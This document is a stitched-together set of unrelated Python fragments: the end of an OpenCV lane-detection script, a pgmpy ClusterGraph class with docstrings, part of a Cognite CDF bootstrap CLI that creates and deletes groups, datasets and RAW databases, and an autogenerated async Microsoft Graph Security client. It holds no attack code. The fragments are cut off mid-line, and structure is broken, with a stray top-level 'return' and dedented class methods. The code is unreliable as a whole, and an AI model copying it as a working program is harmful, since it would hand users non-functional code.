#result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)
#plt.imshow(result)
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
#plt.xlim(0, 1280)
#plt.ylim(720, 0)
#plt.show()
#plt.xlim(0, 1280)
#plt.ylim(0, 720)
#plt.plot(left_fitx, ploty, color='green', linewidth=3)
#plt.plot(right_fitx, ploty, color='green', linewidth=3)
#plt.gca().invert_yaxis() # to visualize as we do the images
#plt.show()
# Define y-value where we want radius of curvature
# I'll choose the maximum y-value, corresponding to the bottom of the image
#y_eval = np.max(ploty)
#left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
#right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
#print(left_curverad, right_curverad)
# Example values: 1926.74 1908.48
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30 / 720 # meters per pixel in y dimension
xm_per_pix = 3.7 / 700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(ploty * ym_per_pix, left_fitx * xm_per_pix, 2)
right_fit_cr = np.polyfit(ploty * ym_per_pix, right_fitx * xm_per_pix, 2)
# Calculate the new radii of curvature
#left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
# 2 * left_fit_cr[0])
#right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
# 2 * right_fit_cr[0])
# Now our radius of curvature is in meters
#print(left_curverad, 'm', right_curverad, 'm')
# Example values: 632.1 m 626.2 m
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
#plt.imshow(result)
#plt.show()
return result
white_output = '../output_images/challenge_video.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of | |
#!/usr/bin/env python3
from collections import defaultdict
import numpy as np
from pgmpy.base import UndirectedGraph
from pgmpy.factors import factor_product
class ClusterGraph(UndirectedGraph):
r"""
Base class for representing Cluster Graph.
Cluster graph is an undirected graph in which each node is associated with a subset of variables. The graph contains undirected
edges that connect clusters whose scopes have a non-empty intersection.
Formally, a cluster graph for a set of factors :math:`\Phi` over :math:`\mathcal{X}` is an
undirected graph :math:`\mathcal{U}`, each of whose nodes :math:`i` is associated with a subset :math:`C_i \subseteq \mathcal{X}`. A cluster
graph must be family-preserving - each factor :math:`\phi \in \Phi` must be associated with a cluster C, denoted
:math:`\alpha(\phi)`, such that :math:`Scope[\phi] \subseteq C_i`. Each edge between a pair of clusters :math:`C_i`
and :math:`C_j` is associated with a sepset :math:`S_{i,j} \subseteq C_i \cap C_j`.
Parameters
----------
data: input graph
Data to initialize graph. If data=None (default) an empty graph is created. The data is an edge list
Examples
--------
Create an empty ClusterGraph with no nodes and no edges
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
G can be grown by adding clique nodes.
**Nodes:**
Add a tuple (or list or set) of nodes as single clique node.
>>> G.add_node(('a', 'b', 'c'))
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
**Edges:**
G can also be grown by adding edges.
>>> G.add_edge(('a', 'b', 'c'), ('a', 'b'))
or a list of edges
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
def __init__(self, ebunch=None):
    """Initialize a ClusterGraph, optionally populated from an edge list.

    Parameters
    ----------
    ebunch: iterable of edges, optional
        Edges to add on construction; each endpoint must be a clique
        node (a list/set/tuple of variables).
    """
    super(ClusterGraph, self).__init__()
    if ebunch:
        self.add_edges_from(ebunch)
    # factors associated with the cliques of this graph
    self.factors = []
def add_node(self, node, **kwargs):
    """Add a single clique node to the cluster graph.

    Parameters
    ----------
    node: node
        A collection of variables forming a clique; must be a list,
        set or tuple. It is normalized to a tuple before insertion.

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> G = ClusterGraph()
    >>> G.add_node(('a', 'b', 'c'))
    """
    if not isinstance(node, (list, set, tuple)):
        raise TypeError(
            "Node can only be a list, set or tuple of nodes forming a clique"
        )
    # normalize to a hashable representation
    clique = tuple(node)
    super(ClusterGraph, self).add_node(clique, **kwargs)
def add_nodes_from(self, nodes, **kwargs):
    """Add multiple clique nodes to the cluster graph.

    Parameters
    ----------
    nodes: iterable container
        A container of clique nodes (each a list, set or tuple of
        variables).

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> G = ClusterGraph()
    >>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
    """
    # delegate per-node validation/normalization to add_node
    for clique in nodes:
        self.add_node(clique, **kwargs)
def add_edge(self, u, v, **kwargs):
    """Add an edge between two clique nodes.

    The two cliques must share at least one variable (a non-empty
    sepset), otherwise a ValueError is raised.

    Parameters
    ----------
    u, v: nodes
        Clique nodes (each a list, set or tuple of variables).

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> G = ClusterGraph()
    >>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
    >>> G.add_edge(('a', 'b', 'c'), ('a', 'b'))
    """
    # the sepset is the intersection of the two clique scopes
    if not set(u) & set(v):
        raise ValueError("No sepset found between these two edges.")
    super(ClusterGraph, self).add_edge(u, v)
def add_factors(self, *factors):
    """Associate one or more factors with the graph.

    Each factor's scope must exactly match one of the clique nodes
    already present in the graph (family preservation).
    See the factors class for the order of potential values.

    Parameters
    ----------
    *factors: pgmpy.factors.factors objects
        Factors on subsets of the model's variables.

    Raises
    ------
    ValueError
        If a factor's scope does not match any clique node.

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> from pgmpy.factors.discrete import DiscreteFactor
    >>> student = ClusterGraph()
    >>> student.add_node(('Alice', 'Bob'))
    >>> factor = DiscreteFactor(['Alice', 'Bob'], cardinality=[3, 2],
    ...                         values=np.random.rand(6))
    >>> student.add_factors(factor)
    """
    # hoisted out of the loop: the node set does not change while adding
    nodes = [set(node) for node in self.nodes()]
    for factor in factors:
        factor_scope = set(factor.scope())
        if factor_scope not in nodes:
            # BUG FIX: implicit string concatenation previously produced
            # the garbled message "...variable notpresent in model"
            raise ValueError(
                "Factors defined on clusters of variable not present in model"
            )
        self.factors.append(factor)
def get_factors(self, node=None):
    """Return the factors added to the graph so far.

    With ``node=None`` the full factor list is returned; otherwise the
    (first) factor whose scope matches the given clique node.

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> from pgmpy.factors.discrete import DiscreteFactor
    >>> G = ClusterGraph()
    >>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
    >>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
    ...                   (('a', 'b', 'c'), ('a', 'c'))])
    >>> phi1 = DiscreteFactor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
    >>> phi2 = DiscreteFactor(['a', 'b'], [2, 2], np.random.rand(4))
    >>> phi3 = DiscreteFactor(['a', 'c'], [2, 2], np.random.rand(4))
    >>> G.add_factors(phi1, phi2, phi3)
    >>> G.get_factors()
    >>> G.get_factors(node=('a', 'b', 'c'))
    """
    if node is None:
        return self.factors
    clusters = [set(clique) for clique in self.nodes()]
    wanted_scope = set(node)
    if wanted_scope not in clusters:
        raise ValueError("Node not present in Cluster Graph")
    # first factor whose scope equals the requested clique
    return next(f for f in self.factors if set(f.scope()) == wanted_scope)
def remove_factors(self, *factors):
    """Remove the given factors from the graph's factor list.

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> from pgmpy.factors.discrete import DiscreteFactor
    >>> student = ClusterGraph()
    >>> factor = DiscreteFactor(['Alice', 'Bob'], cardinality=[2, 2],
    ...                         values=np.random.rand(4))
    >>> student.add_factors(factor)
    >>> student.remove_factors(factor)
    """
    # list.remove drops the first matching entry and raises ValueError
    # if the factor was never added
    for obsolete in factors:
        self.factors.remove(obsolete)
def get_cardinality(self, node=None):
    """Return the cardinality of a variable, or of all variables.

    Parameters
    ----------
    node: any hashable python object (optional)
        The variable whose cardinality we want. If not specified, a
        dictionary mapping every variable to its cardinality is
        returned.

    Returns
    -------
    int or dict
        Cardinality of the given variable, or a defaultdict of all
        cardinalities. Returns None if `node` is given but appears in
        no factor (pre-existing behavior, kept for compatibility).

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> from pgmpy.factors.discrete import DiscreteFactor
    >>> student = ClusterGraph()
    >>> factor = DiscreteFactor(['Alice', 'Bob'], cardinality=[2, 2],
    ...                         values=np.random.rand(4))
    >>> student.add_node(('Alice', 'Bob'))
    >>> student.add_factors(factor)
    >>> student.get_cardinality()
    defaultdict(<class 'int'>, {'Bob': 2, 'Alice': 2})
    >>> student.get_cardinality(node='Alice')
    2
    """
    # BUG FIX: 'if node:' treated falsy-but-valid variable names
    # (e.g. 0 or "") as "no node given" and returned the full dict
    if node is not None:
        for factor in self.factors:
            for variable, cardinality in zip(factor.scope(), factor.cardinality):
                if node == variable:
                    return cardinality
        # implicit None when the variable occurs in no factor
    else:
        cardinalities = defaultdict(int)
        for factor in self.factors:
            for variable, cardinality in zip(factor.scope(), factor.cardinality):
                cardinalities[variable] = cardinality
        return cardinalities
def get_partition_function(self):
    r"""Return the partition function of the cluster graph.

    The partition function is defined as

    .. math:: \sum_{X}(\prod_{i=1}^{m} \phi_i)

    where m is the number of factors present in the graph and X are
    all the random variables present.

    Examples
    --------
    >>> from pgmpy.models import ClusterGraph
    >>> from pgmpy.factors.discrete import DiscreteFactor
    >>> G = ClusterGraph()
    >>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
    >>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
    ...                   (('a', 'b', 'c'), ('a', 'c'))])
    >>> phi1 = DiscreteFactor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
    >>> phi2 = DiscreteFactor(['a', 'b'], [2, 2], np.random.rand(4))
    >>> phi3 = DiscreteFactor(['a', 'c'], [2, 2], np.random.rand(4))
    >>> G.add_factors(phi1, phi2, phi3)
    >>> G.get_partition_function()
    """
    # check_model raises on an inconsistent model, so reaching the body
    # means the factor list is complete and consistent
    if self.check_model():
        head, tail = self.factors[0], self.factors[1:]
        joint = factor_product(head, *tail)
        return np.sum(joint.values)
def check_model(self):
    """Check the model for various errors.

    This method checks for the following errors:

    * Checks if factors are defined for all the cliques or not.
    * Check for running intersection property is not done explicitly
      over here as it is done in the add_edges method.
    * Checks if cardinality information for all the variables is
      available or not. If not it raises an error.
    * Check if cardinality of random variable remains same across all
      the factors.

    Returns
    -------
    check: boolean
        True if all the checks are passed
    """
    # every clique must carry at least one factor with a matching scope
    for clique in self.nodes():
        has_factor = any(
            set(factor.scope()) == set(clique) for factor in self.factors
        )
        if not has_factor:
            raise ValueError("Factors for all the cliques or clusters not defined.")
    cardinalities = self.get_cardinality()
    # every variable appearing in a clique must have a known cardinality
    all_variables = {var for clique in self.nodes() for var in clique}
    if len(all_variables) != len(cardinalities):
        raise ValueError("Factors for all the variables not defined.")
    # a variable's cardinality must agree across all factors
    for factor in self.factors:
        for variable, cardinality in zip(factor.scope(), factor.cardinality):
            if cardinalities[variable] != cardinality:
                raise ValueError(
                    "Cardinality of variable {var} not matching among factors".format(
                        var=variable
                    )
                )
    return True
def copy(self):
"""
Returns a copy of ClusterGraph.
Returns
-------
ClusterGraph: copy of ClusterGraph
Examples
--------
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b'), ('b', 'c')])
>>> G.add_edge(('a', 'b'), ('b', 'c'))
>>> phi1 = DiscreteFactor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi2 = DiscreteFactor(['b', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2)
>>> graph_copy = G.copy()
>>> graph_copy.factors
[<DiscreteFactor representing phi(a:2, | |
"""
NOLIMIT = -1
#
# Groups
#
groups_df = self.client.iam.groups.list(all=True).to_pandas()
available_group_columns = [
column
for column in groups_df.columns
if column in ["name", "id", "sourceId", "capabilities"]
] # fmt: skip
if groups_only:
#
# early exit
#
self.deployed = {"groups": groups_df[available_group_columns]}
return
#
# Data Sets
#
datasets_df = self.client.data_sets.list(limit=NOLIMIT).to_pandas()
if len(datasets_df) == 0:
# create an empty dataframe with columns, as SDK responded with no columns
datasets_df = pd.DataFrame(columns=["name", "id"])
else:
datasets_df = datasets_df[["name", "id"]]
#
# RAW DBs
#
rawdbs_df = self.client.raw.databases.list(limit=NOLIMIT).to_pandas()
if len(rawdbs_df) == 0:
# create an empty dataframe with columns, as SDK responded with no columns
rawdbs_df = pd.DataFrame(columns=["name"])
else:
rawdbs_df = rawdbs_df[["name"]]
# store DataFrames
# deployed: Dict[str, pd.DataFrame]
self.deployed = {
"groups": groups_df[available_group_columns],
"datasets": datasets_df,
"raw_dbs": rawdbs_df,
}
# prepare a yaml for "delete" job
def dump_delete_template_to_yaml(self) -> None:
    """Log a YAML copy/paste template for the 'delete_or_deprecate' step.

    Reloads the deployed CDF state first, then dumps an empty
    'delete_or_deprecate' section alongside the 'latest_deployment'
    inventory of raw_dbs, datasets and groups.
    """
    # groups may have just been created; give CDF a moment before re-reading
    time.sleep(5)  # wait for groups to be created!
    self.load_deployed_config_from_cdf()
    deployed_raw_dbs = sorted(self.deployed["raw_dbs"].sort_values(["name"])["name"].tolist())
    # fillna('') because dataset names can be empty (NaN value)
    deployed_datasets = sorted(self.deployed["datasets"].fillna("").sort_values(["name"])["name"].tolist())
    # fillna('') because group names can be empty (NaN value)
    deployed_groups = sorted(self.deployed["groups"].fillna("").sort_values(["name"])["name"].tolist())
    # TODO: 220509 pa: this dict cannot support (possible) duplicate dataset names
    # and why is this dumped anyway? Is this just for info?
    dataset_ids = {
        row["name"]: row["id"]
        for _, row in sorted(self.deployed["datasets"][["name", "id"]].iterrows())
    }
    delete_template = yaml.dump(
        {
            "delete_or_deprecate": {
                "raw_dbs": [],
                "datasets": [],
                "groups": [],
            },
            "latest_deployment": {
                "raw_dbs": deployed_raw_dbs,
                "datasets": deployed_datasets,
                "groups": deployed_groups,
            },
            "dataset_ids": dataset_ids,
        }
    )
    _logger.info(f"Delete template:\n{delete_template}")
    # return delete_template
"""
### create / delete
* new in config
* delete removed from config
"""
def dry_run(self, dry_run: YesNoType) -> T_BootstrapCore:
    """Set the dry-run flag from a yes/no option.

    Returns self so the call can be chained with other commands.
    """
    enabled = dry_run == YesNoType.yes
    self.is_dry_run = enabled
    return self
# '''
# oo.ooooo. oooo d8b .ooooo. oo.ooooo. .oooo. oooo d8b .ooooo.
# 888' `88b `888""8P d88' `88b 888' `88b `P )88b `888""8P d88' `88b
# 888 888 888 888ooo888 888 888 .oP"888 888 888ooo888
# 888 888 888 888 .o 888 888 d8( 888 888 888 .o
# 888bod8P' d888b `Y8bod8P' 888bod8P' `Y888""8o d888b `Y8bod8P'
# 888 888
# o888o o888o
# '''
def prepare(self, idp_source_id: str) -> None:
    """Create the minimal 'cdf:bootstrap' CDF group needed to run this CLI.

    The group is mapped to the given IdP (source) group id and granted
    the datasets / raw / groups / projects capabilities listed below.
    Honors self.is_dry_run (create_group is expected to check it too —
    NOTE(review): confirm create_group skips writes in dry-run mode).
    """
    group_name = "cdf:bootstrap"
    # group_name = f"{create_config.environment}:bootstrap"
    # capabilities the bootstrapper itself needs to manage datasets,
    # RAW databases and groups project-wide ("all" scope)
    group_capabilities = [
        {"datasetsAcl": {"actions": ["READ", "WRITE", "OWNER"], "scope": {"all": {}}}},
        {"rawAcl": {"actions": ["READ", "WRITE", "LIST"], "scope": {"all": {}}}},
        {"groupsAcl": {"actions": ["LIST", "READ", "CREATE", "UPDATE", "DELETE"], "scope": {"all": {}}}},
        {"projectsAcl": {"actions": ["READ", "UPDATE"], "scope": {"all": {}}}},
    ]
    # TODO: replace with dataclass
    # positional pair consumed by create_group: [sourceId, sourceName]
    idp_mapping = [
        # sourceId
        idp_source_id,
        # sourceName
        f"IdP Group ID: {idp_source_id}",
    ]
    # load deployed groups with their ids and metadata
    self.load_deployed_config_from_cdf(groups_only=True)
    _logger.debug(f"GROUPS in CDF:\n{self.deployed['groups']}")
    # allows idempotent creates, as it cleans up old groups with same names after creation
    self.create_group(group_name=group_name, group_capabilities=group_capabilities, idp_mapping=idp_mapping)
    if not self.is_dry_run:
        _logger.info(f"Created CDF Group {group_name}")
    _logger.info("Finished CDF Project Bootstrapper in 'prepare' mode ")
# '''
# .o8 oooo .
# "888 `888 .o8
# .oooo888 .ooooo. 888 .ooooo. .o888oo .ooooo.
# d88' `888 d88' `88b 888 d88' `88b 888 d88' `88b
# 888 888 888ooo888 888 888ooo888 888 888ooo888
# 888 888 888 .o 888 888 .o 888 . 888 .o
# `Y8bod88P" `Y8bod8P' o888o `Y8bod8P' "888" `Y8bod8P'
# '''
def delete(self):
    """Delete CDF groups and RAW DBs, and deprecate (archive) datasets.

    Driven by the 'delete_or_deprecate' configuration section:
    * groups: deleted by id
    * raw_dbs: deleted recursively (including their tables)
    * datasets: cannot be deleted by design, so they are renamed with a
      '_DEPR_' prefix, marked archived in metadata and time-stamped.
    All mutating calls honor self.is_dry_run.
    """
    # load deployed groups, datasets, raw_dbs with their ids and metadata
    self.load_deployed_config_from_cdf()
    # groups
    group_names = self.delete_or_deprecate["groups"]
    if group_names:
        delete_group_ids = self.deployed["groups"].query("name in @group_names")["id"].tolist()
        if delete_group_ids:
            # only delete groups which exist
            _logger.info(f"DELETE groups: {group_names}")
            if not self.is_dry_run:
                self.client.iam.groups.delete(delete_group_ids)
        else:
            _logger.info(f"Groups already deleted: {group_names}")
    else:
        _logger.info("No Groups to delete")
    # raw_dbs
    raw_db_names = self.delete_or_deprecate["raw_dbs"]
    if raw_db_names:
        delete_raw_db_names = list(set(raw_db_names).intersection(set(self.deployed["raw_dbs"]["name"])))
        if delete_raw_db_names:
            # only delete dbs which exist
            _logger.info(f"DELETE raw_dbs recursive with tables: {raw_db_names}")
            if not self.is_dry_run:
                self.client.raw.databases.delete(delete_raw_db_names, recursive=True)
        else:
            _logger.info(f"RAW DBs already deleted: {raw_db_names}")
    else:
        _logger.info("No RAW Databases to delete")
    # datasets cannot be deleted by design
    # deprecate/archive them by prefix name with "_DEPR_", setting
    # "archive=true" and a "description" with timestamp of deprecation
    dataset_names = self.delete_or_deprecate["datasets"]
    if dataset_names:
        # get datasets which exist by name
        delete_datasets_df = self.deployed["datasets"].query("name in @dataset_names")
        if not delete_datasets_df.empty:
            for i, row in delete_datasets_df.iterrows():
                _logger.info(f"DEPRECATE dataset: {row['name']}")
                update_dataset = self.client.data_sets.retrieve(id=row["id"])
                update_dataset.name = (
                    f"_DEPR_{update_dataset.name}"
                    if not update_dataset.name.startswith("_DEPR_")
                    else f"{update_dataset.name}"
                )  # don't stack the DEPR prefixes
                update_dataset.description = "Deprecated {}".format(self.get_timestamp())
                update_dataset.metadata = dict(update_dataset.metadata, archived=True)  # or dict(a, **b)
                update_dataset.external_id = f"_DEPR_{update_dataset.external_id}_[{self.get_timestamp()}]"
                if self.is_dry_run:
                    _logger.info(f"Dry run - Deprecating dataset: <{update_dataset}>")
                else:
                    # BUG FIX: the update call previously ran unconditionally,
                    # mutating datasets even in dry-run mode (the other
                    # branches above correctly guard on self.is_dry_run)
                    self.client.data_sets.update(update_dataset)
        else:
            _logger.info("No Datasets to archive (and mark as deprecated)")
    # dump all configs to yaml, as copy/paste template for delete_or_deprecate step
    self.dump_delete_template_to_yaml()
    # TODO: write to file or standard output
    _logger.info("Finished deleting CDF Groups, Datasets and RAW Databases")
# '''
# .o8 oooo
# "888 `888
# .oooo888 .ooooo. oo.ooooo. 888 .ooooo. oooo ooo
# d88' `888 d88' `88b 888' `88b 888 d88' `88b `88. .8'
# 888 888 888ooo888 888 888 888 888 888 `88..8'
# 888 888 888 .o 888 888 888 888 888 `888'
# `Y8bod88P" `Y8bod8P' 888bod8P' o888o `Y8bod8P' .8'
# 888 .o..P'
# o888o `Y8P'
# '''
def deploy(self, with_special_groups: YesNoType, with_raw_capability: YesNoType) -> None:
    """Deploy CDF groups, datasets and RAW DBs from the bootstrap config.

    Args:
        with_special_groups: cli override ('yes'/'no') for creating the
            special CDF groups with their aad_mappings; falsy means
            "use the yaml-config / default value".
        with_raw_capability: cli override for creating RAW DBs and the
            'rawAcl' capability; falsy means "use the yaml-config /
            default value".
    """
    # store parameter as bool
    # if provided they override configuration or defaults from yaml-config
    if with_special_groups:
        self.with_special_groups = with_special_groups == YesNoType.yes
    if with_raw_capability:
        self.with_raw_capability = with_raw_capability == YesNoType.yes
    # debug new features and override with cli-parameters
    _logger.info(f"From cli: {with_special_groups=} / {with_raw_capability=}")
    _logger.info(f"Effective: {self.with_special_groups=} / {self.with_raw_capability=}")
    # load deployed groups, datasets, raw_dbs with their ids and metadata
    self.load_deployed_config_from_cdf()
    _logger.debug(f"RAW_DBS in CDF:\n{self.deployed['raw_dbs']}")
    _logger.debug(f"DATASETS in CDF:\n{self.deployed['datasets']}")
    _logger.debug(f"GROUPS in CDF:\n{self.deployed['groups']}")
    # run generate steps (only print results atm)
    target_raw_dbs: List[str] = []
    new_created_raw_dbs: List[str] = []
    if self.with_raw_capability:
        target_raw_dbs, new_created_raw_dbs = self.generate_missing_raw_dbs()
        _logger.info(f"All RAW_DBS from config:\n{target_raw_dbs}")
        _logger.info(f"New RAW_DBS to CDF:\n{new_created_raw_dbs}")
    else:
        # no RAW DBs means no access to RAW at all
        # which means no 'rawAcl' capability to create
        # remove it from the default types
        _logger.info("Creating no RAW_DBS and no 'rawAcl' capability")
        # BUG FIX: acl_default_types is a shared module-level list; an
        # unguarded remove() raises ValueError on a second deploy() call
        if "raw" in acl_default_types:
            acl_default_types.remove("raw")
    target_datasets, new_created_datasets = self.generate_missing_datasets()
    _logger.info(f"All DATASETS from config:\n{target_datasets}")
    _logger.info(f"New DATASETS to CDF:\n{new_created_datasets}")
    # store all raw_dbs and datasets in scope of this configuration
    self.all_scope_ctx = {
        "raw": target_raw_dbs,  # all raw_dbs
        "datasets": target_datasets,  # all datasets
    }
    # reload deployed configs to be used as reference for group creation
    time.sleep(5)  # wait for datasets and raw_dbs to be created!
    self.load_deployed_config_from_cdf()
    # Special CDF Groups and their aad_mappings
    # BUG FIX: use the effective (config-merged) flag instead of only the
    # raw cli parameter, consistent with self.with_raw_capability above
    if self.with_special_groups:
        self.generate_special_groups()
    # CDF Groups from configuration
    self.generate_groups()
    if not self.is_dry_run:
        _logger.info("Created new CDF Groups")
    # and reload again now with latest group config too
    # dump all configs to yaml, as copy/paste template for delete_or_deprecate step
    self.dump_delete_template_to_yaml()
    _logger.info("Finished creating CDF Groups, Datasets and RAW Databases")
    # _logger.info(f'Bootstrap Pipelines: created: {len(created)}, deleted: {len(delete_ids)}')
# '''
# .o8 o8o
# "888 `"'
# .oooo888 oooo .oooo. .oooooooo oooo d8b .oooo. ooo. .oo. .oo.
# d88' `888 `888 `P )88b 888' `88b `888""8P `P )88b `888P"Y88bP"Y88b
# 888 888 888 .oP"888 888 888 888 .oP"888 888 888 888
# 888 888 888 d8( 888 `88bod8P' 888 d8( 888 888 888 888
# `Y8bod88P" o888o `Y888""8o `8oooooo. d888b `Y888""8o o888o o888o o888o
# d" YD
# "Y88888P'
# '''
def diagram(
self,
to_markdown: YesNoType = YesNoType.no,
with_raw_capability: YesNoType = YesNoType.yes,
cdf_project: str = None,
) -> None:
"""Diagram mode used to document the given configuration as a Mermaid diagram.
Args:
to_markdown (YesNoType, optional):
- Encapsulate Mermaid diagram in Markdown syntax.
- Defaults to 'YesNoType.no'.
with_raw_capability (YesNoType, optional):
- Create RAW DBs and 'rawAcl' capability. Defaults to 'YesNoType.tes'.
cdf_project (str, optional):
- Provide the CDF Project to use for the diagram 'idp-cdf-mappings'.
Example:
# requires a 'cognite' configuration section
➟ poetry run bootstrap-cli diagram configs/config-deploy-example-v2.yml | clip.exe
# precedence over 'cognite.project' which CDF Project to diagram 'bootstrap.idp-cdf-mappings'
# making a 'cognite' section optional
➟ poetry run bootstrap-cli diagram --cdf-project shiny-dev configs/config-deploy-example-v2.yml | clip.exe
# precedence over configuration 'bootstrap.features.with-raw-capability'
➟ poetry run bootstrap-cli diagram --with-raw-capability no --cdf-project shiny-prod configs/config-deploy-example-v2.yml
""" # noqa
diagram_cdf_project | |
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_alerts.metadata = {'url': '/Security/alerts/{alert-id}'} # type: ignore
def list_secure_score_control_profiles(
    self,
    orderby: Optional[List[Union[str, "models.Enum20"]]] = None,
    select: Optional[List[Union[str, "models.Enum21"]]] = None,
    expand: Optional[List[str]] = None,
    **kwargs
) -> AsyncIterable["models.CollectionOfSecureScoreControlProfile"]:
    """Get secureScoreControlProfiles from Security.

    Get secureScoreControlProfiles from Security.

    :param orderby: Order items by property values.
    :type orderby: list[str or ~security.models.Enum20]
    :param select: Select properties to be returned.
    :type select: list[str or ~security.models.Enum21]
    :param expand: Expand related entities.
    :type expand: list[str]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either CollectionOfSecureScoreControlProfile or the result of cls(response)
    :rtype: ~azure.core.async_paging.AsyncItemPaged[~security.models.CollectionOfSecureScoreControlProfile]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfSecureScoreControlProfile"]
    # map well-known HTTP status codes to azure-core exception types;
    # callers may extend/override via the 'error_map' kwarg
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    def prepare_request(next_link=None):
        # Build the GET request. The first page combines the operation URL
        # with the client-level paging options ($top, $skip, ...) and the
        # per-call OData options; follow-up pages reuse the service-provided
        # next_link verbatim (no query parameters re-applied).
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        if not next_link:
            # Construct URL
            url = self.list_secure_score_control_profiles.metadata['url']  # type: ignore
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            if self._config.top is not None:
                query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
            if self._config.skip is not None:
                query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
            if self._config.search is not None:
                query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
            if self._config.filter is not None:
                query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
            if self._config.count is not None:
                query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
            if orderby is not None:
                query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
            if select is not None:
                query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request

    async def extract_data(pipeline_response):
        # Deserialize one page and hand AsyncItemPaged the continuation
        # token (odata_next_link) plus the page's items.
        deserialized = self._deserialize('CollectionOfSecureScoreControlProfile', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.odata_next_link or None, AsyncList(list_of_elem)

    async def get_next(next_link=None):
        # Fetch one page; anything other than 200 is surfaced as an error.
        # NOTE(review): here the error body is deserialized before map_error,
        # unlike the non-paged operations in this file — confirm intended
        # (this is the usual autorest output for paged operations).
        request = prepare_request(next_link)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            error = self._deserialize(models.OdataError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        return pipeline_response

    return AsyncItemPaged(
        get_next, extract_data
    )
list_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles'}  # type: ignore
async def create_secure_score_control_profiles(
    self,
    body: "models.MicrosoftGraphSecureScoreControlProfile",
    **kwargs
) -> "models.MicrosoftGraphSecureScoreControlProfile":
    """Create new navigation property to secureScoreControlProfiles for Security.

    Create new navigation property to secureScoreControlProfiles for Security.

    :param body: New navigation property.
    :type body: ~security.models.MicrosoftGraphSecureScoreControlProfile
